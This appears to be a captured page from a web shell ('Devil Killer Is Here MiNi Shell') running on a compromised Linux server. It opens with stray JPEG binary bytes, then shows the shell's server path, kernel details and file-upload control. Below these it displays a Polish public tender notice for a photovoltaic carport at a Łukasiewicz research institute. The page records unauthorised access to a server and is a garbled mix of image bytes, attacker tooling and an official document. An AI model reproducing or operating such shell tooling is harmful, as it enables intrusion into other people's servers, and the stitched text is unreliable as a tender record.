JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250725/0034553001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „System wytwarzający energię elektryczną dla prowadzonych prac badawczych w Sieć Badawcza Łukasiewicz - Instytucie Ciężkiej Syntezy Organicznej ”Blachownia””” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SIEĆ BADAWCZA ŁUKASIEWICZ - INSTYTUT CIĘŻKIEJ SYNTEZY ORGANICZNEJ &#34;BLACHOWNIA&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000041631</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Energetyków 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-225</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@icso.lukasiewicz.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.icso.lukasiewicz.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> badania naukowe i prace rozwojowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „System wytwarzający energię elektryczną dla prowadzonych prac badawczych w Sieć Badawcza Łukasiewicz - Instytucie Ciężkiej Syntezy Organicznej ”Blachownia””” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f4d55dcd-2ccc-4576-921b-dd7d797ce29c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00345530</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/icso <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/icso</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) w zakresie kodowania platforma działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8,<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8) W zakresie czasu odbioru danych – za przekazanie danych do zamawiającego uznaje się klikniecie przycisku ”Złóż ofertę” w<br/>przypadku składania oferty lub ”Wyślij” w przypadku wysyłania wiadomości.<br/>9) Do przesłania dokumentów niezbędne jest posiadanie kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub<br/>podpisu osobistego w celu potwierdzenia czynności złożenia oferty.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/icso</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z treścią art. 19 ust. 1 z dnia 11 września 2019 r. Prawo zamówień publicznych,<br/>dalej „PZP”, w związku z art. 13 ust. 1 i 2 i art. 14 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>1. Z administratorem można skontaktować się telefonicznie, pod numerem +48 77 487 34 70, za pośrednictwem poczty<br/>elektronicznej pod adresem sekretariat@icso.lukasiewicz.gov.pl, oraz listownie przesyłając informacje na adres: ul. Energetyków 9,<br/>47-225 Kędzierzynie-Koźlu.<br/>2. Administrator wyznaczył inspektora ochrony danych, o którym mowa w art. 37-39 RODO. Dane kontaktowe inspektora ochrony<br/>danych w Kędzierzynie-Koźlu, ul. Energetyków 9, tel. +48 77 487 34 70, e-mail : iod@icso.lukasiewicz.gov.pl<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c RODO i ustawy z dnia 11 września 2019 r. PZP<br/>wraz z aktami wykonawczymi w celu związanym z postępowaniem o udzielenie zamówienia publicznego, którego dotyczy<br/>przedmiotowa dokumentacja oraz zawarciem umowy w wyniku jego przeprowadzenia.<br/>4. Zakres danych osobowych wymaganych przez przepisy prawa powszechnie obowiązującego określony został w ustawie Prawo<br/>zamówień publicznych i aktach wykonawczych do tej ustawy (przetwarzane w procesie mogą być dane wrażliwe - w zakresie<br/>wynikającym z przepisów PZP), a także z dokumentacji postępowania (w tym w szczególności dane niezbędne do przygotowania<br/>umowy do jej zawarcia), tj. w szczególności imię i nazwisko, dane identyfikujące podmiot i dane kontaktowe.<br/>5. Państwa dane osobowe przetwarzane są w celu udzielenia zamówienia publicznego.<br/>6. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu przepisy prawa, w tym o art. 18 oraz art. 74 ust. 1 i 2 PZP – dla uczestników postępowania o udzielenie zamówienia<br/>publicznego. Po zakończeniu postępowania dokumentacja postępowania wraz z danymi osobowymi może być udostępniana<br/>każdemu zainteresowanemu na podstawie ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej. Może to<br/>spowodować przekazanie danych osobowych poza Europejski Obszar Gospodarczy.<br/>Pełną informację zawiera SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FT.271.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych związanych z realizacją projektu pn.: System<br/>wytwarzający energię elektryczną dla prowadzonych prac badawczych.<br/>Przedmiotem zamówienia jest kompleksowa realizacja carportu fotowoltaicznego wraz z infrastrukturą towarzyszącą,<br/>obejmująca projektowanie, uzyskanie pozwoleń, wykonanie robót budowlano-montażowych, instalację urządzeń,<br/>uruchomienie, przeszkolenie oraz świadczenie usług serwisowych i gwarancyjnych. Założeniem podstawowym inwestycji<br/>jest zapewnienie energii na potrzeby własne Zamawiającego. W związku z tym celem Zamawiającego jest uzyskanie<br/>maksymalnie wysokiej mocy carportu fotowoltaicznego przy jednoczesnym zapewnieniu maksymalnej liczby miejsc<br/>parkingowych. Zamawiający zakłada, ze łączna moc carportu nie będzie niższa niż 300 kWp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium oceny ofert: cena oferty brutto: 100%<br/>Zamawiający dokona oceny ofert nieodrzuconych w ramach kryteriów oceny ofert przyjmując zasadę, ze 1% = 1 pkt.<br/>Oferta o najniższej cenie brutto, nieodrzucona - uzyska maksymalną ilość 100 punktów.<br/>Pozostałym oferentom przyznana zostanie odpowiednio mniejsza ilość punktów wg wzoru:<br/>C =Cn/Cb *100 pkt<br/>gdzie:<br/>Cn – najniższa cena brutto spośród nieodrzuconych ofert za zamówienie.<br/>Cb – cena brutto oferty ocenianej.<br/>Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska najwyższą ilość punktów za zamówienie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia może ubiegać się Wykonawca, który posiada zdolność techniczną lub zawodową niezbędną do<br/>wykonania zamówienia tj.:<br/>warunkiem udziału w postępowaniu jest wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jednej instalacji fotowoltaicznej wraz z montażem o<br/>mocy minimum 50 kW.<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, iż wykonał w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jedną instalację<br/>fotowoltaiczną wraz z montażem o mocy minimum 50 kW oraz potwierdzi dowodami, że wykazana robota została wykonana<br/>należycie, w szczególności poda informację, że robota została wykonana zgodnie z przepisami prawa i prawidłowo<br/>ukończona.<br/>UWAGA wykonawcy mogą wykazać się doświadczeniem także wówczas jeżeli realizowali wymagane zamówienie w<br/>formule dostaw z montażem.<br/>W przypadku gdy złożone przez Wykonawców dokumenty, oświadczenia dotyczące warunków udziału w postępowaniu<br/>zawierają dane/informacje w innych walutach niż określono w niniejszym SWZ Zamawiający jako kurs przeliczeniowy waluty<br/>przyjmie kurs NBP z dnia publikacji ogłoszenia o zamówieniu. Jeżeli w dniu ogłoszenia nie będzie opublikowany średni kurs<br/>walut przez NBP, Zamawiający przyjmie kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem<br/>publikacji ogłoszenia o zamówieniu.<br/>Jeżeli w postępowaniu o udzielenie zamówienia biorą udział Wykonawcy występujący wspólnie (konsorcjum) w/w warunek<br/>musi spełnić co najmniej jeden z Wykonawców, który wykona roboty do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Wykonawca, którego oferta została oceniona najwyżej składa na wezwanie Zamawiającego w terminie wyznaczonym przez<br/>Zamawiającego, nie krótszym niż 5 dni od wezwania, aktualne na dzień złożenia podmiotowe środki dowodowe tj.:<br/>1) wykaz robót budowlanych o których mowa w rozdziale 18 ust. 3 SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne dokumenty, wg treści załącznika nr 4 SWZ.<br/>2.Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w<br/>odniesieniu do konkretnego zamówienia lub jego części polegać na zdolnościach technicznych lub zawodowych podmiotów<br/>udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby składa wraz z ofertą zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie , będzie dysponował niezbędnymi zasobami<br/>tych podmiotów.<br/>3. Wykonawcy wspólnie ubiegający się o zamówienie dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy wg treści załącznika nr 3 SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu,<br/>2) spełniają warunki udziału w postępowaniu.<br/>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 108 ust. 1<br/>ustawy Pzp.<br/>2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na postawie art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego.<br/>3 . Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu oraz oświadczenie o spełnianiu warunków udziału<br/>w postępowaniu wg treści załącznika nr 1 do SWZ, podpisane kwalifikowanym podpisem elektronicznym lub podpisem<br/>zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli.<br/>4. W przypadku gdy w postępowaniu o udzielenie niniejszego zamówienia biorą udział Wykonawcy występujący wspólnie<br/>(konsorcjum), brak podstaw do wykluczenia z postępowania w zakresie określonym w ust. 1 i ust. 2 musi wykazać każdy z<br/>Wykonawców wspólnie ubiegający się o udzielenie zamówienia. W przypadku gdy Wykonawca polega na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby w celu wykazania spełnienia warunku udziału w postępowaniu, składa<br/>dodatkowo oprócz własnego oświadczenia, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>Wykonawca powołuje się na zasoby ww. podmiotu.<br/>5. Oferta, oświadczenia oraz wszystkie dokumenty składane wraz z ofertą wymagają podpisu osób uprawnionych do<br/>reprezentowania firmy w obrocie gospodarczym, zgodnie z aktem rejestracyjnym i wymaganiami ustawowymi. Jeżeli oferta,<br/>oświadczenia oraz dokumenty składane wraz z ofertą zostaną podpisane przez umocowanego przedstawiciela wykonawcy,<br/>do oferty należy dołączyć pełnomocnictwo w formie elektronicznej (czyli opatrzone podpisem kwalifikowanym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Pełnomocnictwo musi zostać podpisane przez<br/>mocodawcę (osobę udzielającą pełnomocnictwa), a nie przez osobę otrzymującą pełnomocnictwo.<br/>6.W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający<br/>żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru wraz z ofertą. Wykonawca nie jest zobowiązany do złożenia w/w dokumentu<br/>jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane<br/>umożliwiające dostęp do tych dokumentów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum),<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy (lider konsorcjum).<br/>1) Pełnomocnictwo, o którym mowa powyżej, powinno być w formie elektronicznej (czyli opatrzone podpisem<br/>kwalifikowanym) lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym osób upoważnionych<br/>do reprezentowania wykonawców oraz zostać przekazane w ofercie wspólnej wykonawców.<br/>2) Wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 455 ust. 1 pkt 2–4 i ust. 2 ustawy Prawo zamówień publicznych, Zamawiający<br/>na podstawie art. 455 ust. 1 pkt 1 w/w ustawy dopuszcza możliwość wprowadzania zmiany umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku zaistnienia okoliczności niemożliwych do<br/>przewidzenia w chwili zawierania umowy lub w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1) zmiany kluczowych specjalistów przedstawionych w umowie – na pisemny wniosek Zamawiającego lub wykonawcy w<br/>postaci pisemnej zgody,<br/>2) zmiana terminu wykonania przedmiotu umowy na pisemny, udokumentowany wniosek wykonawcy w razie wystąpienia<br/>jednej z następujących okoliczności:<br/>a) wstrzymanie robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego,<br/>b) działania siły wyższej, za które uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy, a<br/>których strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki 